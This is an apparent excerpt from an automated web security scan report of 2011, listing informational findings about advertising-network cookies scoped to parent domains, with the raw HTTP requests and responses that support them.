Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=Z1-UkUPq1vFj8GCnevJA2KXPE2TFnOA0M_WT2exB_6Nh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MBxqPiAYpCYd3j_6MfsPlMh53jqED7k2YniAtZPVqfFWyxKvcAJbr9b_kzSFkanJuWO28abj1iv9Gv55XNWfMiw5pMuH6RTJNAHblpwBDk2T1wXcoL7Q2zkkhi9AC1e6PNmlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib1OoXqrfdwtdG7Pp8fEmP0RO1BgA0BJmNitU_2NEj2fHdezpP7kSHcGVCNOXldgVDwW4Q7G96F_uxzfd0sMvSg4z5M54jeAtYCpK6P6H7YLfn1DM2JHon2Lg_l7lDsiT8znxJAatjK_8wTO5tRuZ3XmAl8yAkjzMu60avymcp27zO-9MBVRaOICeVmt0y5elVS00w8o4kTkeT0M3Rv13tNe-KMtsmN_rfKIZLBsrIbZ0Ab_1obB3eU-U6Z0afsrnZftOdxqgu9zaA9BEiA6GyCALmKUKKFE7ohNDi6PefIl64Pb4jyDZez37XoLDFRz9aXnoPz5SThj_DvdguRRNEucYg00aQbrhHmId6TwPhXu76yC6Xpua0XHhwiiO6LimyFMzyKuXBH_zaKGoR-cizFPU5q-qS65e77PR9HaVucWwVvnmlsEQ_Atbdsc7UFm5r_xNRMntMj0v83tuXwoxESvmHp0q8wlx1yaN_b8Qgsy2AKyQi2Rbow26cVTOuaTA2O7EcPEhO-noAo46R_e24qwGCrSBorbtNH5M4cO413R5q6ohebL9J2uZQCBqdE68xlu-7BMsZILlJ1GaKK7JeQ0NX3h3aJ1949KHw8E3HcObqqagiCGVgCdK45TXMokXLNbLuay2_Mt8CFITD7Jngr96fRVjMkjVdVwCfn3jY17LdcA89lw_nuxmuMlq4JPuMvBgd7KD-dSBKfWGSR1M5LiNft9usTHYdghvjPaGdOl0oeDPIpDvfXPcF_hHNKAWi9PW-kET4hoTQkmFc9qp_NZWUKqCzXEjua3bdNL3CHoIF3JRLm-lzLvmU4Mu5vDpETlLJNWSrKQ378tsap95j5WqVoBRRvw_8l_9s_rOZMLzYU2TbhE8zQ2PWHJZhQi88rAm7PyPAWBG8bc1l4eZXJ7qI6SVzjsUIQsGpeiuqy0wZsvJnUfvCegfWPkjFXygnBsrvjdzgzubbc5BofE4fxcMPpyUlfN1EzgUZ2v0L4yTh1VNDYPhttMQaQJ-b77UV8QBUBB42JBqSKatn3vpXyL6TOAicxCOf2XgpY5js6GsmnvWs8SyvDw_QeTyHBaWJSPcsWWbSJo-8gq8nYPQ6BzbnNtDWU-qVEEawvsFJvVrgq6UuEmTyoYjhtb_gPFxhiDjF0OxifaKQDH01ro4Wwg; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: fc=vaJ6aoyywMi4NqtlKsU64lht9mm7-E1xIImTItPA1urbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOwF6Kobi_0otjkQAmScc-TZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: pf=A62R0s-qigjspkCN3ccCJZUfVYhQeEUQKVt0ATDwEBd4MaYm-hBniQ2x_WbJU5VofR8HsN28iFo6HdZJoYg636sNildKFCNXpyKvUiTLZIHjhKTZoZfl0UmM4YAE9VltLd4zaBhLXK6dA3tQW6GTY_mhMXcZkp2CGVOUe9dNA1dLc3SbvsAbpvKUhZ_1F-gMqt697FUnnCyNJa5eXuHVqkYk9oOpEEnBnxokixh0TAcnTloknPCKo_m2KWZ0znMHGX1FGgNaH1QNLww2o9FWDf92KpcEjM9puswoJnlptpg_Ua1SMLgL8e4oitE3gQEt0IYL2CsvvDQbzbzoZi58WVFU2_HfnlKzH2WjiB0I74yjr5MEZ55HOjknaleEn8uqphJLAkUsMWh_vdfMYZ4DsAqVswvpKACSML7qepV3TXcVzrbaB5_N9dG_mUB3DBQpHCwQOntCh3wzWqFyTO9sCmbID1pM7GdJCmEvQvhgCerVKPuxNShLT7BdA74b9PIpJFJv0bKrvIAXiY5kxeBqDZM9McQOVbCG47DlR2tl0RZrXlLfPhjB-LAv0hBAzyAT8WyNLsptBsE0pyyMNzm8KTDTfIrxKwKcgVAF0j3DpG-Ah_L2mBEhIVZyz3v4hUv82NTphEWhwEZTsAeCcCRJGQ16FhMiQjewtL7hTKHHtYomz6Mgv9ntnMipgM9tObOSRi5sdEi6v2SSHlqkNcZ1Insylw9OuZiK2Z9Z1ZInGi2VyX45sYdTfBGAwKx_QKsRDOFWXyC8BwuYcP4g_M8_5sW-t1RZ1RZoZx7lrsMhMHodIDnIK6ly468s-StQw1rNNbnQrRiBaZdoox-8l-4ssS8cnCaJbHr6avLClL1L-ZgHVS17gTosFV1LPoOJqMoPVx8L9V4GQ55oLDrsRz9rTx9FeqPBBvBYGO1SdqujwXgi0vu0SmNRlepXu23ylR2425RDJExopm1fmCCVJh_u9NPFwH371j224eEs7ZO_Ajtb9hEO5hT0MYYwff0a4aDJ8dVm-HlCOmQllIxHHVPmqo5POfQNhu-I5BtsxdNdff3L0rrE_rQqKLBssQ48bm9_mXQzReNjx3lXy785TIo-y5veNkje6bZOCdvzPqpApnQKiSIwki5f-ITER4DSY4219M583u_ZPKiH6Ea4p59q66AhR0SCoMm0IXZ_t5_lhYgWzvjS6P-UHDNUBWN18PSjuJp9aVntFwJIXFrQO8XwyhujvEUOLmkRuJtqn5C1FWr3rHK_ua4i4QGywfYupaV2fuScMz9nUn-9DR4XMyfjq6f9MS-DaFKt2RaSz_BBjJKiIA7uafV8NNMTbjh0U1qug__vmYjXW251NXxsKK_4qFzSypNenDnJ6HQ-3068v6hBJfEyf0yd-2fLUXx6iqh9wMyw-RaWvEndJRgsZP3zOckxnpD1Bh0doyFi9Md6WZu8mx8U3kUMFDpZ0SqI-5d7X_-8-uyf42RpEQk10dwHo6E6IPJGWiCATH5pcXIPM9vPxG-uEMBzxe02yDopCwxH8LV8wxWtacb8pPjx7gKH5cGBR1KqovJK3yVBhrs2V7Q; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:22 GMT
Content-Length: 10227

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
if (this.width
...[SNIP]...

13.11. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 11:39:33 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

13.12. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjNt9jGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; path=/; domain=.adbrite.com; expires=Wed, 10-Aug-2011 11:39:41 GMT
ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 11:39:41 GMT
vsd=0@1@4dcbc6fd@cdn.turn.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 11:39:41 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYoNJIo0ZD9h4gSR2t6eX%2Bx%2FvwBCsGtyeY2n2TujHgBvTG%2BOKQ4qYoHHIwCcAEMBdNBHdKy17BavWQ9ZY77OrEDINIg1XDOObQOMHgCjJhYvvPUetd3CRKpcfmSZlq5gkiP6%2BTF%2B9H%2BYUa1jLmSW036QqX1%2BmfKP6Ns3zY8yzQBi7s3J7OHh4jvaxE5RmaKbXB4kqguFLGpV9pfqzKR2k0rtnngbgUsbdqym9abDOQa21stM%2BZ904IVzmE7JGYsst5yCLj41ykxWGUwv5bBOElWhM5XZAX9%2FMFIAF1JUSrh%2FiP4PV6Aw%3D%3D"; vsd=0@1@4dcaa3a0@d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 11:39:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjNt9jGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; path=/; domain=.adbrite.com; expires=Wed, 10-Aug-2011 11:39:41 GMT
Set-Cookie: ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 11:39:41 GMT
Set-Cookie: vsd=0@1@4dcbc6fd@cdn.turn.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 11:39:41 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

13.13. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_LKv8="MLsXrrEOpxpv55C28tahZ2a57v4BlBldCJ+Iio1e3Hap1Il9kVWT6VLylaFsMiOIFsKHpjjz7J2U7z9Uo4JeZID1W23WKas0Wh9C6Sor/tzggGLG8gt5zaN4m4WCHIidCpV6s3HMduhPPOd/6/olAcH77sPsFms0zIbhzNkwT9vKMU81lpWZk1hblau2nsfXOr2KsTF2nk2To/EmZI/ry2OVE13p6cA6rTTEk45VWgFNzHgRD9gBbu89J7MfO4f070NcasoleESOqPrJoAP0gbCr4HCJhVixf5QrQTSZEBNgGBsQs+nq3jKvbaIkKQgR2iWvce7Q7r7mn6DXgQoxk5Tc5XaZ26hUUK613yi5NPphPfjyJS5dNn6cor+5Z7/2w3GYUjhihK8UhHxBga6IzOc37/8ibz0xRpSwHDTgnZJmdSouDmILRcdLlOCqO2KvS8CglyIyIW36CjCyqPKXZ4mA+Ch2F7VzK1m4ynmwvMzE71WWAm9cuv1GAdRRNpmJeDTgdJLe5OePC2hhiMIwAh/LQpSKkYrFcAsXYhZ8x2aBT0Ry0BO7QXLXKedgCeNMMCOF+CBkmO8YeNkfEsag2hVDbdJ9ACEK/9eg5SEAZFPfmDNt2tj2Ive5NyF4L0J8+JNCfYqY2FcOywI4omJJUnsX2TgkFngrQVU5K0yXFYE47bgxdx6YBA/4IXTuF0oGmxLuY7MSgWmNt8J7Xl5naLyZNUEwjp30jM5mNPCnGx4DFUAsxq7Yojzi/6hvo1fbz2JPQytoz0FEDVAJEeN2yP0IsMD5jItWPUv7Wx1AX7BAgwjJ4RMIwhwVlxJl9eoB2GMv1GB+8rrbAB9JwdaoP9lw7ezBcOJkp+N1aBrbLaNdoiJs/tXABJ8fRJ3A09CfnY0IjO2OzSoL4a75tNhRCfLQCzKrd+0HJP/8Y+q+ZXwLhuINuKf7CjTqzqhiG1tOtM4bvtzZG52dZgOJRnICiL1WDobijiTGfV6yV7JbAY/Zx5Uj69IrD7PwohPAkfVj7374Hf0Mnk/V8lbUnEAiHKOWdDRM0vEHnJohXzsgNusj9VGXR0TAtczxjdxPwOxJK6PC0aZ93oM725lCigs3hxCnE7kpU6IaDCYi0U0Jf+h9RTbohCnJCS6b3Dd2l8pJw/6902gfxDyhg25fVt6lGrrCscWGC/PAtNaccUCI5BPyRyOludJgBzYr/ULdM/jlcEo6n3igTIpIeWIa5s378NY8CUro/sTIkMTtiwIUFGHuZ/4k8b8alBAdnqbr3UzFBL8d45cKuIO1mY03cnXCDOmOWQoLCg6BiMYfhaMhueht/Mays9BrXFCmJHyGf4LBdNeeI1EYCweAIZJqsJb90A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4y+jOBYULQEEu6zYIA6DmFfDuOqv5R26co+k4LFAgBjGPtxaqC9ZQYFpxPJB8bqfwyN2xvBNX+iHnk3gvE8eBlgm3HLVc4NN303pzfdAGd8THA8HLXYXGA4tFNY3PjIDERCnonHtyxCDqGK+h70Y1wW9gOCkLl/7j7cT18RsMCq8cq9jz18La4D9oeCWufq45MNWcIXHPCvDBhXLnLByUsphq7XP04fqyRmBWanY8QIwqe75K7q/Vwh8ZJJ/Gx0ehFvayx3fVqHTSStYdZDNt3IfJK53dMC/f6WOx26le6GEuhTa6ej92sZrv5cyBWYYpDis3r338ptcasgHhio3YxAvf9TKp7LJwVVJ0d1JBLfyr/tZkhZc3Iy/8F++PCDZl3jq+OQjK4lyVnka0FxyVNMJsJmek2qwDrWHGKp8n4mXeZZdqWVVDNe6WOl4hg6Kj83BTlH6ux2EdYdyUVQjkBiDZ9gX1Wq0fEE1ek70c1nCmi+JUxETvwlfDBnEFNEZRIHwYUYLppsu6jk5asJFOT0nvpUeQkBTKgjW/Qn6eUtNAFG3+ztEjIjQvTEffA8qO58M+LeTVBxlhV0QJRYVW5Sx/JvI8e/akogNcHmtI7QD7QCgXe7isimAa7ntSOlWeluX8QMr2NJrrA3feWM2vTctmlJrwKofmBqWxDUDvxWG9RACZKhtIz3loTOuDS8nt/ha2/RYZsuHkji206e8ZYmB4eInuvlia9FbYHnFmPQcI8rs2jFIlJiD/QoPMch6qhpvzlf2RVEOj7qwu77+u8ZPF4WZaFrEghhw0AOJMD4tZZiZ0eRa1MmEtfLpEOF8Kq5/iF7fivLDn2D5HtRMSwwHaH8bFxSAHlzo87FKMM8LER9fFAsq/p1AuC1NMlYq6y0KDDdOYsXpVt7jYnQKccmrQ0fFoziIhjSzxqxXYoO4thHbiNDS3xkLH1Ta+1mU0fyTq3ZzznAhgDSI